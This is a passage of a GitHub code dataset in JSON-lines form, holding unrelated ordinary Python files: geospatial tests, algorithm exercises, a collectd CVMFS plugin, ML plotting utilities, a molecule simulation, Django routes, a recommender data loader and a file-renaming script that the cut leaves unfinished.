\"FALSE\"},\n quiet=True,\n )\n\n with rasterio.Env(GDAL_DISABLE_READDIR_ON_OPEN=\"FALSE\"):\n with rasterio.open(\"cogeo.tif\") as src:\n assert \"IMD\" not in src.tag_namespaces()\n assert \"RPC\" not in src.tag_namespaces()\n\n cog_translate(\n raster_ns_meta,\n \"cogeo.tif\",\n deflate_profile,\n forward_ns_tags=True,\n config={\"GDAL_DISABLE_READDIR_ON_OPEN\": \"FALSE\"},\n quiet=True,\n )\n\n with rasterio.Env(GDAL_DISABLE_READDIR_ON_OPEN=\"FALSE\"):\n with rasterio.open(\"cogeo.tif\") as src:\n assert src.tags(ns=\"IMD\")\n assert src.tags(ns=\"RPC\")\n","repo_name":"cogeotiff/rio-cogeo","sub_path":"tests/test_cogeo.py","file_name":"test_cogeo.py","file_ext":"py","file_size_in_byte":26117,"program_lang":"python","lang":"en","doc_type":"code","stars":265,"dataset":"github-code","pt":"16"} +{"seq_id":"1425100136","text":"# 2667 단지번호붙이기\n#\nimport sys\ninput = sys.stdin.readline\n\nN = int(input())\nhome = []\nfor i in range(N):\n home.append(list(map(int,input().rstrip())))\n\nvisit = [[0] * N for _ in range(N)]\ndx = [-1, 1, 0, 0]\ndy = [0, 0, -1, 1]\ncnt = 0\nnew = []\nfor i in range(N):\n for j in range(N):\n if not home[i][j] or visit[i][j]:\n continue\n count = 1\n stack = [[i, j]]\n visit[i][j] = 1\n while stack:\n p, q = stack.pop()\n\n for k in range(4):\n x = p + dx[k]\n y = q + dy[k]\n if 0 <= x < N and 0 <= y < N and home[x][y] and not visit[x][y]:\n stack.append([x,y])\n count += 1\n visit[x][y] = 1\n\n new.append(count)\n cnt += 1\n\nprint(cnt)\nnew = sorted(new)\nfor i in new:\n print(i)","repo_name":"hhongjj/Algorithm","sub_path":"BOJ/4.SILVER/S1_2667.py","file_name":"S1_2667.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"11003630611","text":"from urllib import parse\n\n\ndef url_decode(url):\n res = parse.unquote(url)\n return res\n\n\ntests = [\n ('http://www.google.bg/search?q=C%23', 'http://www.google.bg/search?q=C#'),\n ('https://mysite.com/show?n%40m3=p3%24h0', 'https://mysite.com/show?n@m3=p3$h0'),\n ('http://url-decoder.com/i%23de%25?id=23', 'http://url-decoder.com/i#de%?id=23'),\n]\n\nfor url, expected in tests:\n result = url_decode(url)\n print(url)\n print(expected, \"|\",result)\n print(expected == result)\n","repo_name":"ivo-bass/web_softuni","sub_path":"web/utils/url_decode.py","file_name":"url_decode.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"16428860371","text":"import collectd\nimport xattr\nimport os\nimport psutil\nimport threading\nimport time\nimport uuid\n\ntry:\n from os import scandir\nexcept ImportError:\n from scandir import scandir\n\nCVMFS_ROOT = '/cvmfs'\nPLUGIN_NAME = 'cvmfs'\n\nCONFIG_DEFAULT_MEMORY = True\nCONFIG_DEFAULT_MOUNTTIME = True\nCONFIG_DEFAULT_INTERVAL = -1\nCONFIG_DEFAULT_MOUNTTIMEOUT = 5\n\nclass CvmfsProbeConfig(object):\n def __init__(self):\n self.repos = []\n self.attributes = []\n self.memory = CONFIG_DEFAULT_MEMORY\n self.mounttime = CONFIG_DEFAULT_MOUNTTIME\n self.mounttimeout = CONFIG_DEFAULT_MOUNTTIMEOUT\n self.interval = CONFIG_DEFAULT_INTERVAL\n self.config_name = uuid.uuid4().hex\n self.verbose = False\n\n def __str__(self):\n return \"CvmfsProbeConfig - Repos: {0} - Attributes: {1} - Memory: {2} - MountTime: {3} - Interval: {4} - ConfigName: {5} - Verbose: {6}\".format(\n self.repos,\n self.attributes,\n self.memory,\n self.mounttime,\n \"%ss\" % self.interval if self.interval > 0 else \"global 
interval\",\n self.config_name,\n self.verbose\n )\n\n\nclass CvmfsProbe(object):\n def debug(self, msg, verbose=False):\n if verbose:\n collectd.info('{0} plugin: {1}'.format(PLUGIN_NAME, msg))\n\n\n def safe_scandir(self, directory, timeout):\n contents = []\n t = threading.Thread(target=lambda: contents.extend(scandir(directory)))\n t.daemon = True\n t.start()\n t.join(timeout)\n if t.is_alive():\n raise Exception(\"Scandir timed out after {0} seconds\".format(timeout))\n return contents\n\n\n def read_mounttime(self, repo_mountpoint, timeout):\n start = time.time()\n self.safe_scandir(repo_mountpoint, timeout)\n end = time.time()\n # Did we really mount it ?\n try:\n xattr.getxattr(repo_mountpoint, 'user.fqrn') == repo_mountpoint\n return end - start\n except:\n raise Exception(\"Repository was not mounted correctly\")\n\n def read_memory(self, repo_mountpoint):\n repo_pid = int(xattr.getxattr(repo_mountpoint, 'user.pid'))\n process = psutil.Process(repo_pid)\n if callable(getattr(process, \"get_memory_info\", None)):\n return process.get_memory_info()\n else:\n return process.memory_info()\n\n def read(self, config):\n self.debug(\"probing config: {0}\".format((config)), config.verbose)\n val = collectd.Values(plugin=PLUGIN_NAME)\n for repo in config.repos:\n val.plugin_instance = repo\n val.interval = config.interval\n repo_mountpoint = os.path.join(CVMFS_ROOT, repo)\n\n try:\n mounttime = self.read_mounttime(repo_mountpoint, config.mounttimeout)\n if config.mounttime:\n val.dispatch(type='mounttime', values=[mounttime], interval=config.interval)\n val.dispatch(type='mountok', values=[1], interval=config.interval)\n except Exception as e:\n collectd.warning('cvmfs: failed to get MountTime for repo %s: %s' % (repo, e))\n val.dispatch(type='mountok', values=[0], interval=config.interval)\n\n if config.memory:\n try:\n repo_mem = self.read_memory(repo_mountpoint)\n val.dispatch(type='memory', type_instance='rss', values=[repo_mem.rss], interval=config.interval)\n val.dispatch(type='memory', type_instance='vms', values=[repo_mem.vms], interval=config.interval)\n except Exception:\n collectd.warning('cvmfs: failed to get Memory for repo %s' % repo)\n\n for attribute in config.attributes:\n attribute_name = \"user.%s\" % attribute\n try:\n val.dispatch(type=attribute, values=[float(xattr.getxattr(repo_mountpoint, attribute_name))], interval=config.interval)\n except Exception:\n collectd.warning('cvmfs: failed to inspect attribute \"%s\" in repo \"%s\"' % (attribute_name, repo_mountpoint))\n\n\n def str2bool(self, boolstr):\n if boolstr.lower() == 'true':\n return True\n elif boolstr.lower() == 'false':\n return False\n else:\n raise TypeError('Boolean value expected.')\n\n\n def configure(self, conf):\n config = CvmfsProbeConfig()\n for node in conf.children:\n key = node.key.lower()\n if key == 'repo':\n config.repos += node.values\n elif key == 'attribute':\n config.attributes += node.values\n elif key == 'memory':\n try:\n config.memory = self.str2bool(node.values[0])\n except:\n collectd.info(\"cvmfs: Memory value %s is not valid. It must be either True or False\" % (node.values[0]))\n elif key == 'mounttime':\n try:\n config.mounttime = self.str2bool(node.values[0])\n except:\n collectd.info(\"cvmfs: MountTime value %s is not valid. 
It must be either True or False\" % (node.values[0]))\n elif key == 'mounttimeout':\n config.mounttimeout = int(node.values[0])\n elif key == 'interval':\n config.interval = int(node.values[0])\n elif key == 'verbose':\n config.verbose = self.str2bool(node.values[0])\n\n if config.interval > 0:\n collectd.register_read(callback=self.read, data=config, interval=config.interval, name=config.config_name)\n else:\n collectd.register_read(callback=self.read, data=config, name=config.config_name)\n\n collectd.info(\"cvmfs: configured callback with config: {0}\".format(config))\n\nprobe = CvmfsProbe()\ncollectd.register_config(probe.configure)\n","repo_name":"cvmfs/collectd-cvmfs","sub_path":"src/collectd_cvmfs/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5928,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"} +{"seq_id":"16612272548","text":"from lib2to3.pytree import Base\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom typing import List, Tuple\nimport pickle\nfrom sklearn.base import BaseEstimator\nfrom sklearn.metrics import (\n RocCurveDisplay, roc_auc_score, ConfusionMatrixDisplay\n)\nfrom sklearn.model_selection import GridSearchCV\nfrom fastapi import pipeline_factory\n\ndef get_subplot_dim(num:int)->Tuple[int,int]:\n \"\"\"returns row and column dimensions closest to a square\n\n Args:\n num (int): total number of graphs needed\n\n Returns:\n Tuple[int,int]: (rows,columns) to make a group of subplots square\n \"\"\"\n r = int(np.floor(np.sqrt(num)))\n c = int(np.ceil(num/r))\n return r,c\n\ndef get_second_deriv(continuous_data:pd.Series)->pd.Series:\n \"\"\"Calculates the second derivative at every point in the series\n\n Args:\n continuous_data (pd.Series): Sorted pd.Series of numerical data\n\n Returns:\n pd.Series: A series of calculated second\n derivatives between each point of the input\n \n \"\"\"\n df = continuous_data.rename('x').to_frame()\n df['next'] = df['x'].shift()\n df['prev'] = df['x'].shift(-1)\n return df.apply(\n lambda row:\n row['next']+row['prev'] - 2*row['x'],\n axis=1\n )\n\ndef graph_elbow(loss:pd.Series)->int:\n \"\"\"graphs the elbow of a pd.Series of Kmeans inertias\n to show optimum number of clusters,\n then returns the optimum number of clusters\n\n Args:\n series (pd.Series): A pd.Series of Kmeans inertia at every cluster no.\n\n Returns:\n int: optimal number of clusters\n \"\"\"\n ax = sns.lineplot(x=loss.index,y=loss)\n elbow = get_second_deriv(loss).argmax()+loss.index.min()\n ax.axvline(elbow,0,ax.get_ylim()[1],color='red',**{'alpha':0.5})\n ax.set_xlabel('Parameter')\n ax.set_title(f'Optimal # of Clusters: {elbow}')\n return elbow\n\ndef graph_cv_results(grid_cv:GridSearchCV,x:str,hue:str)->None:\n \"\"\"graphs the cross validation results\n\n Args:\n grid_cv (GridSearchCV): trained sklearn gridsearch object\n x (str): hyperparameter name you want for x axis\n hue (str): another hyperparameter name you want to compare \n \"\"\"\n cvDat = pd.DataFrame(grid_cv.cv_results_)\n cv_tst_score_cols = cvDat.columns[\n cvDat.columns.str.contains('split[0-9]_test_score',regex=True)\n ]\n \n fig, ax = plt.subplots(figsize=(8,8))\n ax = sns.lineplot(\n data=cvDat[[x,hue]].join(\n cvDat.apply(\n lambda row: row[cv_tst_score_cols].to_numpy(),\n axis=1\n ).rename('test_score')\n ).explode('test_score'),\n x=x,y='test_score',hue=hue,ax=ax\n )\n ax.set_title(\n grid_cv.best_params_\n )\n\n return\n\ndef graph_estimator_auc(\n 
estimators:List[BaseEstimator], data_ls:List[np.ndarray],\n y_test:np.ndarray[int],figsize:Tuple[int,int]=(12,8))->None:\n \"\"\"Graphs the ROC curve of multiple estimators at once in a single plot\n and shows the AUC value\n\n Args:\n estimators (List[BaseEstimator]): list of trained sklearn estimators\n data_ls (List[np.ndarray]): list of test data for each estimator\n y_test (np.ndarray[int]): true labels for test set\n figsize (Tuple[int,int], optional): Figure size. Defaults to (12,8).\n \"\"\"\n r,c = get_subplot_dim(len(estimators))\n fig, ax = plt.subplots(r,c,figsize=figsize)\n for estim, dat, subplot in zip(estimators,data_ls,ax.flatten()):\n RocCurveDisplay.from_estimator(\n estim,dat,y_test,ax=subplot)\n score = str(roc_auc_score(y_test,estim.predict_proba(dat)[:,1]))[:7]\n subplot.set_title(\n f'{estim.__class__.__name__} AUC: {score}'\n )\n plt.tight_layout()\n \ndef graph_estimator_cmat(\n estimators:List[BaseEstimator], data_ls:List[np.ndarray],\n y_test:np.ndarray[int],figsize:Tuple[int,int]=(12,8))->None:\n \"\"\"Graphs the confusion matrix of multiple estimators at once in a \n single plot\n\n Args:\n estimators (List[BaseEstimator]): list of trained sklearn estimators \n data_ls (List[np.ndarray]): list of test data for each estimator\n y_test (np.ndarray[int]): true labels for test set\n figsize (Tuple[int,int], optional): Figure size. Defaults to (12,8).\n \"\"\"\n r,c = get_subplot_dim(len(estimators))\n fig, ax = plt.subplots(r,c,figsize=figsize)\n for estim, dat, subplot in zip(estimators,data_ls,ax.flatten()):\n ConfusionMatrixDisplay.from_estimator(\n estim,dat,y_test,ax=subplot,cmap='bone')\n subplot.set_title(\n f'{estim.__class__.__name__}'\n )\n plt.tight_layout()\n \ndef graph_feat_importance(\n feat_imps:List[np.ndarray],feat_names:List[str])->None:\n \"\"\"graphs the top 10 most important features for each estimator\n\n Args:\n feat_imps (List[np.ndarray]): feature importances of estimator\n feat_names (List[str]): feature names\n \"\"\"\n plt.figure(figsize=(7,6))\n named_imps = pd.Series(\n feat_imps,index=feat_names\n ).sort_values(ascending=False).head(10)\n ax = sns.barplot(x=named_imps,y=named_imps.index)\n ax.set_title('Top 10 Most Important Features')\n \ndef calculate_gain(estimator:BaseEstimator, y_test:np.ndarray[int],\n x_test:np.ndarray[np.number])->pd.Series:\n \"\"\"returns a dataframe that calculates gain\n\n Args:\n estimator (BaseEstimator): trained sklearn estimator\n y_test (np.ndarray[int]): true labels for test set\n x_test (np.ndarray[np.number]): test set features\n\n Returns:\n pd.Series: Series with gain calculated at each decile, where\n each index indicates which decile the gain value is for\n \"\"\"\n ranked_probs = pd.DataFrame(\n {'label':y_test,'prob':estimator.predict_proba(x_test)[:,1]}\n ).sort_values('prob',ascending=False)\n \n ranked_probs['decile'] = np.digitize(\n ranked_probs['prob'],\n np.percentile(ranked_probs['prob'],range(100,-1,-10)),\n right=False\n )\n ranked_probs['decile'] = ranked_probs['decile'].replace(0,1)\n gain = (\n ranked_probs.groupby('decile')['label'].sum()\n .sort_index().cumsum()\n /ranked_probs['label'].sum()\n )\n return gain\n \ndef graph_lift(\n estimator:BaseEstimator, y_test:np.ndarray[int],\n x_test:np.ndarray[np.number],figsize:Tuple[int,int]=(7,6))->None:\n \"\"\"Graphs the lift of the estimator\n\n Args:\n estimator (BaseEstimator): trained sklearn estimator\n y_test (np.ndarray[int]): true labels for test set\n x_test (np.ndarray[np.number]): test set features\n figsize 
(Tuple[int,int], optional): Figure size. Defaults to (12,8).\n \"\"\"\n gain = calculate_gain(estimator,y_test,x_test)\n lift = gain*10/(gain.index)\n plt.figure(figsize=figsize)\n ax = sns.barplot(x=lift.index,y=lift)\n ax.set_title(f'Lift Chart for {estimator.__class__.__name__}')\n ax.set_ylabel('Lift')\n for i in ax.containers:\n ax.bar_label(i,)\n \ndef graph_gain(estimator:BaseEstimator, y_test:np.ndarray[int],\n x_test:np.ndarray[np.number],figsize:Tuple[int,int]=(7,6))->None:\n \"\"\"Graphs the gain of the estimator\n\n Args:\n estimator (BaseEstimator): trained sklearn estimator\n y_test (np.ndarray[int]): true labels for test set\n x_test (np.ndarray[np.number]): test set features\n figsize (Tuple[int,int], optional): Figure size. Defaults to (12,8).\n \"\"\"\n gain = calculate_gain(estimator,y_test,x_test)\n plt.figure(figsize=figsize)\n ax = sns.lineplot(x=gain.index,y=gain,marker='o')\n ax.set_title(f'Gain Chart for {estimator.__class__.__name__}')\n ax.set_ylabel('Gain')\n \n for gain_val, decile in zip(gain, gain.index):\n ax.annotate(f'({round(gain_val*100,1)})', xy=(decile-0.4,gain_val+0.02))\n \ndef pickle_model(model:object,file_path:str)->None:\n with open(file_path, 'wb') as handle:\n pickle.dump(model, handle, protocol=pickle.HIGHEST_PROTOCOL)\n \ndef load_pickle_model(file_path:str)->object:\n with open(file_path, 'rb') as handle:\n model = pickle.load(handle)\n return model","repo_name":"Jeff-ChenFan-Wang/TelecomChurnAnalysis","sub_path":"graph_utils.py","file_name":"graph_utils.py","file_ext":"py","file_size_in_byte":8227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"24277626699","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 14 19:10:01 2021\n\n@author: souma\n\"\"\"\n\n\n# Creating a basic class\nclass Employee:\n # Classes need an init method\n def __init__(self, fname, lname, salary):\n self.fname = fname\n self.lname = lname\n self.salary = salary\n self.email = self.fname.lower() + '.' 
+ self.lname.lower() + \"@company.com\"\n\n    def fullname(self):\n        return self.fname + \" \" + self.lname\n    # Instantiate the class\n\n\nemp_1 = Employee('Soumadiptya', 'Chakraborty', 92000)\nemp_2 = Employee('Surbhi', 'Welekar', 65000)\nprint(emp_1.email)\nprint(emp_1.fullname())\n# Running class method with Instance\nprint(Employee.fullname(emp_2))\n","repo_name":"soumadiptya/Useful_PythonCodes_and_Materials","sub_path":"OOP in Python/OOP Lesson 1- Classes and Instances.py","file_name":"OOP Lesson 1- Classes and Instances.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"4061819491","text":"#Tweaked for visuals\nfrom __future__ import division\n\nfrom visual import *\nfrom visual.graph import * # import graphing features\n\nO=Oxygen=sphere(pos=vector(0,0,0),radius=10*.66e-11, color=color.red)\nH1=Hydrogen1=sphere(pos=vector(95.564e-12,7.2661e-12,0),radius=10*.31e-11)\nH2=Hydrogen2=sphere(pos=vector(-95.564e-12,7.2661e-12,0),radius=10*.31e-11)\nNa=Sodium=sphere(pos=vector(0,-10e-12,195e-12), radius=116e-13, color=color.yellow)\n\n#With a Kick\n#H1=Hydrogen1=sphere(pos=vector(90e-12,7e-12,0),radius=10*.31e-11) \n#H2=Hydrogen2=sphere(pos=vector(-90e-12,7e-12,0),radius=10*.31e-11) \n\nmO=15.99/(6.022e26)\nmH=1.0079/(6.022e26)\nmNa=22.9897/(6.022e26)\nqO=.8\nqH=.4\nqNa=1\nqCl=-1\n\n#Given from experimentation\nk=50\nupp=5e-5\n\npO=mO*vector(0, 0, 0)\npH1=mH*vector(0, 0, 0)\npH2=mH*vector(0, 0, 0)\npNa=mNa*vector(0, 0, 0)\n\n#graph1 = gcurve(color=color.white)\ngraph2 = gcurve(color=color.blue)\n\n#Intramolecular Force Modeled by springs only and intermolecular force modeled by Coulomb only\nke=8.987551e+9\nt=0\ndt=15e-20\n\nwhile t<5e-12:\n    t=t+dt\n    Fl1=-k*(mag(H1.pos-O.pos)-95.84e-12)*norm(H1.pos-O.pos)\n    Fl2=-k*(mag(H2.pos-O.pos)-95.84e-12)*norm(H2.pos-O.pos)\n    Fa=upp*(mag(H1.pos-H2.pos)-191.128e-12)*norm(H1.pos-H2.pos)\n    FONa=((ke*qO*qNa)/(mag(Na.pos-O.pos))**2)*-norm(Na.pos-O.pos)\n    FNaO=-((ke*qO*qNa)/(mag(Na.pos-O.pos))**2)*-norm(Na.pos-O.pos)\n    FH1Na=((ke*qNa*qH)/(mag(Na.pos-H1.pos))**2)*-norm(Na.pos-H1.pos)\n    FH2Na=((ke*qNa*qH)/(mag(Na.pos-H2.pos))**2)*-norm(Na.pos-H2.pos)\n\n    H1.pos=H1.pos+((pH1)/mH)*dt\n    H2.pos=H2.pos+((pH2)/mH)*dt\n    O.pos=O.pos+((pO)/mO)*dt\n    Na.pos=Na.pos+((pNa)/mNa)*dt\n\n    pH1=pH1+(Fl1-Fa-FH1Na)*dt\n    pH2=pH2+(Fl2+Fa-FH2Na)*dt\n    # FH1O/FH2O were never defined (NameError); assume the net force on O is the spring reactions from H1 and H2 plus the Coulomb force FNaO from the sodium ion\n    pO=pO+(-Fl1-Fl2+FNaO)*dt\n    pNa=pNa+(FONa+FH1Na+FH2Na)*dt\n    \n    #graph1.plot(pos=(t,mag(H1.pos-O.pos)-95.84e-12))\n    graph2.plot(pos=(t,mag(Na.pos-O.pos)-95.84e-12))\n    \n","repo_name":"Kinnardian/water-molecule-model","sub_path":"Ion Water Interaction.py","file_name":"Ion Water Interaction.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"17191106840","text":"from django.conf.urls import url\nfrom . 
import views\n\napp_name = 'website'\n\nurlpatterns = [\n url(r'^$',views.index,name='index'),\n url(r'^game/(?P<token>-?[0-9]+)/$',views.gameboard,name='game'),\n url(r'^joingame/$',views.joingame,name='joingame'),\n url(r'^done/$',views.done,name='done'),\n url(r'^server_request/$',views.server_request,name='server_request')\n]\n","repo_name":"EmberCS15/CS348-Network-Lab-Projects","sub_path":"Assign7/othello/website/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"34874763341","text":"import numpy as np\nfrom collections import defaultdict\n\n\nclass Dataset(object):\n\n def __init__(self, filename):\n self._data = np.load(filename)\n self.train_data = self._data['train_data']\n self.test_data = self._data['test_data'].tolist()\n self._train_index = np.arange(len(self.train_data), dtype=np.uint)\n self._n_users, self._n_items = self.train_data.max(axis=0) + 1\n\n # Neighborhoods\n self.user_items = defaultdict(set)\n self.item_users = defaultdict(set)\n self.item_users_list = defaultdict(list)\n for u, i in self.train_data:\n self.user_items[u].add(i)\n self.item_users[i].add(u)\n # Get a list version so we do not need to perform type casting\n self.item_users_list[i].append(u)\n\n self._max_user_neighbors = max([len(x) for x in self.item_users.values()])\n\n @property\n def train_size(self):\n \"\"\"\n :return: number of examples in training set\n :rtype: int\n \"\"\"\n return len(self.train_data)\n\n @property\n def user_count(self):\n return self._n_users\n\n @property\n def item_count(self):\n return self._n_items\n\n def _sample_item(self):\n \"\"\"\n Draw an item uniformly\n \"\"\"\n return np.random.randint(0, self.item_count)\n\n def _sample_negative_item(self, user_id):\n \"\"\"\n Uniformly sample a negative item\n \"\"\"\n if user_id > self.user_count:\n raise ValueError(\"Trying to sample user id: {} > user count: {}\".format(\n user_id, self.user_count))\n\n n = self._sample_item()\n positive_items = self.user_items[user_id]\n\n if len(positive_items) >= self.item_count:\n raise ValueError(\"The User has rated more items than possible %s / %s\" % (\n len(positive_items), self.item_count))\n while n in positive_items or n not in self.item_users:\n n = self._sample_item()\n return n\n\n def _generate_data(self, neg_count):\n idx = 0\n self._examples = np.zeros((self.train_size*neg_count, 3),\n dtype=np.uint32)\n self._examples[:, :] = 0\n for user_idx, item_idx in self.train_data:\n for _ in range(neg_count):\n neg_item_idx = self._sample_negative_item(user_idx)\n self._examples[idx, :] = [user_idx, item_idx, neg_item_idx]\n idx += 1\n\n def get_data(self, batch_size, neighborhood, neg_count):\n # Allocate inputs\n batch = np.zeros((batch_size, 3), dtype=np.uint32)\n pos_neighbor = np.zeros((batch_size, self._max_user_neighbors), dtype=np.int32)\n pos_length = np.zeros(batch_size, dtype=np.int32)\n neg_neighbor = np.zeros((batch_size, self._max_user_neighbors), dtype=np.int32)\n neg_length = np.zeros(batch_size, dtype=np.int32)\n\n # Shuffle index\n np.random.shuffle(self._train_index)\n\n idx = 0\n for user_idx, item_idx in self.train_data[self._train_index]:\n # TODO: set positive values outside of for loop\n for _ in range(neg_count):\n neg_item_idx = self._sample_negative_item(user_idx)\n batch[idx, :] = [user_idx, item_idx, neg_item_idx]\n\n # Get neighborhood information\n if neighborhood:\n if len(self.item_users[item_idx]) > 0:\n 
pos_length[idx] = len(self.item_users[item_idx])\n pos_neighbor[idx, :pos_length[idx]] = self.item_users_list[item_idx]\n else:\n # Length defaults to 1\n pos_length[idx] = 1\n pos_neighbor[idx, 0] = item_idx\n\n if len(self.item_users[neg_item_idx]) > 0:\n neg_length[idx] = len(self.item_users[neg_item_idx])\n neg_neighbor[idx, :neg_length[idx]] = self.item_users_list[neg_item_idx]\n else:\n # Length defaults to 1\n neg_length[idx] = 1\n neg_neighbor[idx, 0] = neg_item_idx\n\n idx += 1\n # Yield batch if we filled queue\n if idx == batch_size:\n if neighborhood:\n max_length = max(neg_length.max(), pos_length.max())\n yield batch, pos_neighbor[:, :max_length], pos_length, \\\n neg_neighbor[:, :max_length], neg_length\n pos_length[:] = 1\n neg_length[:] = 1\n else:\n yield batch\n # Reset\n idx = 0\n\n # Provide remainder\n if idx > 0:\n if neighborhood:\n max_length = max(neg_length[:idx].max(), pos_length[:idx].max())\n yield batch[:idx], pos_neighbor[:idx, :max_length], pos_length[:idx], \\\n neg_neighbor[:idx, :max_length], neg_length[:idx]\n else:\n yield batch[:idx]\n","repo_name":"princewen/tensorflow_practice","sub_path":"recommendation/Basic-CMN-Demo/util/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":5151,"program_lang":"python","lang":"en","doc_type":"code","stars":6427,"dataset":"github-code","pt":"16"} +{"seq_id":"23264545801","text":"import sys\nfrom collections import defaultdict\n\nsys.path.append(\"..\")\nfrom input import Input\n\ndef parse(line):\n if '$' in line:\n return line.split('$ ')[-1].split('cd ')[-1]\n else:\n parts = line.split(' ')[::-1]\n return [parts[0], 0] if parts[1] == 'dir' else [parts[0], int(parts[1])]\n \ndef create_tree(source):\n tree = defaultdict(list)\n prev_node = '~'\n current_node = '/'\n for item in source:\n line = parse(item)\n if isinstance(line, list):\n if line[1] == 0:\n tree[current_node].append(f'{current_node}::{line[0]}')\n else:\n tree[current_node].append(line[1])\n elif line == '/':\n current_node = f'{prev_node}::/'\n elif line == '..':\n current_node = prev_node\n prev_node = '::'.join(prev_node.split('::')[:-1])\n elif line != 'ls':\n prev_node = current_node\n current_node = f'{current_node}::{line}'\n\n return tree\n\ndef get_folder_sizes(source):\n tree = create_tree(source)\n \n while True:\n for k, v in tree.items():\n if isinstance(v, list):\n if all(isinstance(x, int) for x in v):\n tree[k] = sum(v)\n \n for k in list(tree):\n new_value = []\n if isinstance(tree[k], list):\n for x in tree[k]:\n if isinstance(x, str) and isinstance(tree[x], int):\n new_value.append(tree[x])\n else:\n new_value.append(x)\n tree[k] = new_value\n\n if all(isinstance(x, int) for x in tree.values()):\n break\n\n return tree\n\ndef small_folders_total(source):\n return sum(x for x in get_folder_sizes(source).values() if x <= 100000)\n\ndef smallest_deleteable_dir(source, filesystem_total = 70000000, needed_space = 30000000):\n available_space = filesystem_total - get_folder_sizes(source)['~::/']\n deletion_needed = needed_space - available_space\n return next(filter(lambda folder_size: folder_size > deletion_needed, sorted(get_folder_sizes(source).values())))\n\ninput = Input()\n\n# PART ONE\n# print(small_folders_total(input.example))\nprint(small_folders_total(input.puzzle))\n\n# PART TWO\n# 
print(smallest_deleteable_dir(input.example))\nprint(smallest_deleteable_dir(input.puzzle))\n","repo_name":"peaky76/advent_of_code_2022","sub_path":"day_7/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"28805561225","text":"from pathlib import Path\n\nimport pandas as pd\nfrom pandas import DataFrame\n\n\nclass TickerData:\n def __init__(self):\n self.exchanges = [\n (\"nasdaq\", \"nasdaq-listed.csv\"),\n (\"amex\", \"amex-listed.csv\"),\n (\"nyse\", \"nyse-listed.csv\"),\n ]\n\n def load_exchange_tickers_or_given_stocks(self, stocks) -> DataFrame:\n exchange_securities = [s for s in self._extract_data(self.exchanges)]\n exchange_tickers = pd.concat(exchange_securities)\n\n if stocks:\n selected_stocks = stocks.split(\",\")\n exchange_tickers = exchange_tickers[\n exchange_tickers.index.isin(selected_stocks)\n ]\n\n return exchange_tickers\n\n def _extract_data(self, exchanges):\n for exchange, data_file in exchanges:\n df = self._load_from(\"data/{}\".format(data_file))\n df[\"exchange\"] = exchange\n yield df\n\n def _load_from(self, listing_path):\n securities_file = Path.cwd().joinpath(listing_path)\n return pd.read_csv(securities_file, index_col=[\"Symbol\"])\n\n\nticker_data = TickerData()\n","repo_name":"namuan/stock-rider","sub_path":"krider/ticker_data.py","file_name":"ticker_data.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"74557564168","text":"#! /usr/bin/python3\n# renameDates.py - rename filenames in cwd with US MM-DD-YYYY\n# date format to EU DD-MM-YYYY.\n\nimport shutil, os, re\n\n# create regex for US MM-DD-YYYY or MM/DD/YYYY pattern\nusDatePattern = re.compile(r\"\"\"^(.*?) # all possible text before the date\n ((0|1)?\\d) # one or two digits for the month (e.g.: 01, 11 or 1)\n (-|\\\\) # separator\n ((0|1|2|3)?\\d) # one or two digits for the day (e.g.: 01, 11, 21, 31 or 1)\n (-|\\\\) # separator\n ((1|2)\\d\\d\\d) # 1YYY to 2YYY for the year\n (.*?)$ # all possible text after the date\n \"\"\", re.VERBOSE) # VERBOSE allow comments and whitespaces\n\n# loop over the files in the cwd\nfor usFilename in os.listdir('.'):\n mo = usDatePattern.search(usFilename)\n \n if not mo:\n continue\n\n # get the different parts of the mo\n beforePart = mo.group(1)\n monthPart = mo.group(2)\n separator1 = mo.group(4)\n dayPart = mo.group(5)\n separator2 = mo.group(7)\n yearPart = mo.group(8)\n afterPart = mo.group(10)\n # ***OBS***\n # (each '(' and ')' defines a group):\n # datePattern = re.compile(r\"\"\"^(1) all text before the date\n # (2 (3) )- one or two digits for the month\n # (4) separator1\n # (5 (6) )- one or two digits for the day\n # (7) separator2\n # (8 (9) ) four digits for the year\n # (10)$ all text after the date\n # \"\"\", re.VERBOSE)\n # ***OBS***\n\n euFilename = beforePart + dayPart + separator1 + monthPart + separator2 + yearPart + afterPart\n # Get the full, absolute file paths.\n absWorkingDir = os.path.abspath('.')\n usFilename = os.path.join(absWorkingDir, usFilename)\n euFilename = os.path.join(absWorkingDir, euFilename)\n\n # Rename the files.\n print('Renaming \"%s\" to \"%s\"...' 
